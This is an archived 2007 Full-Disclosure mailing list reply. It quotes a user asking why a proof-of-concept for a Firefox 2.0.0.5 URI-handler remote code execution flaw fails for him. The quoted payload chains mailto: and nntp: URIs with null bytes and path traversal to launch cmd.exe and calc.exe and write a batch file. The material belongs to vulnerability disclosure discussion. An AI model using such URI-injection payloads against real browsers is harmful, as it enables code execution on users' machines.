| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 25 Jul 2007 10:11:12 +0100 From: "pdp (architect)" <pdp.gnucitizen@...glemail.com> To: "Mesut EREN" <meren@...akkiremit.com.tr> Cc: full-disclosure@...ts.grok.org.uk Subject: Re: FIREFOX 2.0.0.5 new vulnerability works like a charm :) ? On 7/25/07, Mesut EREN <meren@...akkiremit.com.tr> wrote: > > > > Hi all, > > FF 2.0.0.5 new remote code Execution vulnerability, I tested FF 2.0.0.5. But > don't work is code. > > Example code is > > mailto:%00%00../../../../../../windows/system32/cmd".exe > ../../../../../../../../windows/system32/calc.exe " - " > blah.bat > > nntp:%00%00../../../../../../windows/system32/cmd".exe > ../../../../../../../../windows/system32/calc.exe " - " > blah.bat > > Where i missing? > > > > Mesut EREN > BAŞAK ÇATI & CEPHE SİSTEMLERİ > Bilgi İşlem Sorumlusu > > MCSA:S,MCSE:S,CEH,CCNA > > meren@...akkiremit.com.tr > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- pdp (architect) | petko d. petkov http://www.gnucitizen.org _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists